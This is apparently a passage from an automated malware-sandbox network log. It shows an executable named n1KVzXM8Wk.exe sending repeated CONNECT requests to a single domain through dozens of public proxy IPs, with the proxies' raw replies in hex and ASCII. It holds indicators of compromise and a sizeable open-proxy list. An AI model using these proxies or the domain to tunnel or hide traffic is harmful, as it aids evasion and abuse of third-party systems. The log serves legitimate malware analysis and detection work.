                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=8; IE=EDGE"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://fonts.googleapis.com/css?family=Roboto&display=swap" rel="stylesheet"> <style type="text/css"> body { height: 100%; font-family: Roboto, Helvetica, Arial, sans-serif; color: #6a6a6a; margin: 0; display: flex; align-items: center; justify-content: center; } input[type=date], input[type=email], input[type=number], input[type=password], input[type=search], input[type=tel], input[type=text], input[type=time], input[type=url], select, textarea { color: #262626; vertical-align: baseline; margin: .2em; border-style: solid; border-width: 1px; border-color: #a9a9a9; background-color: #fff;


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      530192.168.2.451599156.67.217.159806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.969079018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.301918983 CET327INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      531192.168.2.45172345.14.174.180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.983571053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.070600986 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      532192.168.2.45169118.185.169.15031286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.985488892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.160541058 CET144INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: ASP.NET
                                                                                                      Server: squid/4.14
                                                                                                      Content-Length: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      533192.168.2.45082165.20.216.24980806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.985492945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      534192.168.2.45170098.188.47.15041456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.006921053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      535192.168.2.45163127.65.116.24310806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.009859085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      536192.168.2.4516628.213.128.6116812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.027086973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.340806007 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      537192.168.2.451704184.185.2.1241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.034257889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      538192.168.2.45185591.231.186.1334436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.044774055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      539192.168.2.45186091.231.186.1334436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.054100037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      540192.168.2.45172546.17.63.16641546812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.058753014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.234554052 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      541192.168.2.45186491.231.186.1334436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.059421062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      542192.168.2.45081561.129.2.21280806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.065709114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.612138033 CET59INHTTP/1.1 200 Connection Established
                                                                                                      Proxy-agent: nginx


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      543192.168.2.451567112.51.96.11890916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.072633028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.098624945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.685672998 CET325INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      544192.168.2.451739174.64.199.8241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.080480099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      545192.168.2.451729154.92.116.7763896812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.100615978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.402740002 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                                      Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                                      Proxy-Connection: close
                                                                                                      X-Webshare-Error: 407
                                                                                                      X-Webshare-Reason: invalidpassword
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Length: 121
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                                      Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      546192.168.2.45080192.255.164.16641456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.101589918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      547192.168.2.451800104.21.85.109806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.119524002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.207263947 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      548192.168.2.451757139.180.39.20580806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.120573997 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:21.311067104 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      549192.168.2.45175098.170.57.24941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.120656013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      550192.168.2.45174247.229.171.15031286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.120834112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.680795908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.366487980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.680294991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.975100994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.365895033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.680622101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.178508997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:44.084261894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      551192.168.2.45173695.140.154.7580806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.120997906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.724889040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.334815025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.646940947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.844052076 CET22INHTTP/1.1 502 ERROR


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      552192.168.2.451807172.67.162.127806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.121227980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.208822966 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      553192.168.2.451744139.59.149.137380626812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.121524096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.587043047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      554192.168.2.451835104.23.100.73806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.135601997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.223593950 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      555192.168.2.45176272.195.34.4141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.136008024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      556192.168.2.451791198.27.82.143320076812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.136271000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.586998940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.098788977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.893712997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.464884043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.055339098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.700213909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.944087982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.334772110 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      557192.168.2.451848203.24.109.109806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.146369934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.234285116 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
